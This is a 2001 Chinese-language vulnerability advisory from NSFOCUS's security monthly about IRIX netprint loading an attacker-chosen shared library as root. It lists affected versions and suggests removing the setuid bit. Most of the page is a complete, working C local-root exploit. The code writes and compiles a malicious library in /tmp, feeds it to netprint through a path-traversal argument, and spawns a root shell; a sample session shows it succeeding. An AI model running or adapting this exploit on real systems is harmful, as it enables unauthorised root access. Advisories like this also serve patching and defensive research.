首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第21期->最新漏洞
期刊号: 类型: 关键词:
IRIX 'netprint' 打开任意动态链接库漏洞

日期:2001-05-15

受影响的系统:  
    SGI IRIX 6.5.9
    SGI IRIX 6.5.8
    SGI IRIX 6.5.7
    SGI IRIX 6.5.6
    SGI IRIX 6.5.5
    SGI IRIX 6.5.4
    SGI IRIX 6.5.3
    SGI IRIX 6.5.2
    SGI IRIX 6.5.10
    SGI IRIX 6.5.1
    SGI IRIX 6.5
    SGI IRIX 6.4
    SGI IRIX 6.3
    SGI IRIX 6.2
    SGI IRIX 6.1
    SGI IRIX 6.0.1
    SGI IRIX 6.0
    SGI IRIX 5.3

不受影响系统:  
SGI IRIX 6.5.11

描述:
--------------------------------------------------------------------------------


BUGTRAQ ID: 2656

SGI Irix系统携带的netprint工具用于向远程主机提交打印任务,缺省安装后它是
setuid-to-root的。netprint从命令行上接收-n选项指定的网络类型,根据-n后面的
参数串打开相应的动态链接库。但是netprint没有对这个参数串做检查,攻击者可以
提供自己的动态链接库。由于netprint本身是setuid-to-root的,攻击者提供的代码
将以root身份运行。尽管只有lp用户可以执行netprint,但在许多早期版本的Irix中,
lp是无口令的默认帐号。如果lp帐号未被禁用,远程攻击者可以以lp身份登录进入系
统,利用netprint的漏洞获取root权限。

<* 来源:Vade79 (v9@realhalo.org) *>



测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



/* (IRIX)netprint[] local root exploit, by: v9[v9@fakehalo.org].  this will
   give you uid=0 on IRIX systems.  this exploit simply takes advantage of
   netprint's -n option to execute arbitrary code and gain elevated
privileges.

   example:
----------------------------------------------------------------------------
--
$ cc xnetprint.c -o xnetprint
$ id
uid=9(lp) gid=9(lp)
$ ./xnetprint /bin/sh
[(IRIX)netprint[] local root exploit, by: v9[v9@realhalo.org]. ]
[*] making symbols source file for netprint to execute.
[*] done, now compiling symbols source file.
[*] done, now checking to see if the symbols source compiled.
[*] done, now executing netprint.
[*] success, uid: 0, euid: 0, gid: 0, egid: 0.
# id
uid=0(root) gid=0(sys)
#
----------------------------------------------------------------------------
--

   note: built and tested on IRIX 6.2.  this often requires the uid of lp
         to work correctly.  though, should prove effective up to 6.4 or
         higher.
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#define PATH "/usr/lib/print/netprint" /* path to exploitable program. */
#define CCPATH "/usr/bin/cc" /* path to compiler. */
#define SRCFILE "/tmp/xnetrpintso.c" /* path to temporary symbols source. */
#define SOFILE "/tmp/xnetprintso.so" /* path to compile as. */
#define FAKESOFILE "../../../../tmp/xnetprintso" /* arg to feed netprint. */
void cleanup(unsigned short i){
if(!access(SRCFILE,F_OK))
  unlink(SRCFILE);
if(!access(SOFILE,F_OK))
  unlink(SOFILE);
if(i)
  exit(i);
}
int main(int argc,char **argv){
char *syscmd;
struct stat mod;
FILE *symbol;
printf("[(IRIX)netprint[] local root exploit, by:
v9[v9@realhalo.org]. ]\n");
if(argc<2){
  printf("[!] syntax: %s </path/to/program/to/exec>\n",argv[0]);
  cleanup(1);
}
if(stat(PATH,&mod)){
  printf("[!] failed, could not get stats on %s.\n",PATH);
  cleanup(1);
}
if(mod.st_uid||!(S_ISUID&mod.st_mode)){
  printf("[!] failed, %s is not setuid root.\n",PATH);
  cleanup(1);
}
if(access(argv[1],X_OK)){
  printf("[!] failed, %s doesn't seem to exist or is not executable.\n",
  argv[1]);
  cleanup(1);
}
if(access(CCPATH,X_OK)){
  printf("[!] failed, %s compiler doesn't seem to exist or is not
executable."
  "\n",CCPATH);
  cleanup(1);
}
printf("[*] making symbols source file for netprint to execute.\n");
cleanup(0);
if(!(symbol=fopen(SRCFILE,"w"))){
  printf("[!] failed, could not open temporary file to write to.\n");
  cleanup(1);
}
fprintf(symbol,"void OpenConn(){\n");
fprintf(symbol," seteuid(0);\n");
fprintf(symbol," setuid(0);\n");
fprintf(symbol," setegid(0);\n");
fprintf(symbol," setgid(0);\n");
fprintf(symbol," printf(\"\[*] success, uid: %%u, euid: %%u, gid: %%u,
egid: "
"%%u.\\n\",getuid(),geteuid(),getgid(),getegid());\n");
fprintf(symbol," execl(\"%s\",\"%s\",0);\n",argv[1],argv[1]);
fprintf(symbol,"}\n");
fprintf(symbol,"void CloseConn(){}\n");
fprintf(symbol,"void ListPrinters(){}\n");
fprintf(symbol,"void SendJob(){}\n");
fprintf(symbol,"void CancelJob(){}\n");
fprintf(symbol,"void WaitForJob(){}\n");
fprintf(symbol,"void GetQueue(){}\n");
fprintf(symbol,"void StartTagging(){}\n");
fprintf(symbol,"void StopTagging(){}\n");
fprintf(symbol,"void Install(){}\n");
fprintf(symbol,"void IsDest(){}\n");
fclose(symbol);
printf("[*] done, now compiling symbols source file.\n");
if(!(syscmd=(char
*)malloc(strlen(CCPATH)+strlen(SRCFILE)+strlen(SOFILE)+13+1)
)){
  printf("[!] failed, could not allocate memory.\n");
  cleanup(1);
}
sprintf(syscmd,"%s %s -shared -o %s",CCPATH,SRCFILE,SOFILE);
system(syscmd);
printf("[*] done, now checking to see if the symbols source compiled.\n");
if(access(SOFILE,R_OK)){
  printf("[!] failed, symbols source was not compiled properly.\n");
  cleanup(1);
}
printf("[*] done, now executing netprint.\n");
if(execl(PATH,PATH,"-n",FAKESOFILE,"-h0","-p0","0-0",0)){
  printf("[!] failed, %s did not execute properly.\n",PATH);
  cleanup(1);
}
}


--------------------------------------------------------------------------------
建议:

    一个临时解决方案是"chmod u-s netprint",但是这可能影响打印子系统的某些
    功能。SGI即将提供安全补丁。


版权所有,未经许可,不得转载
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客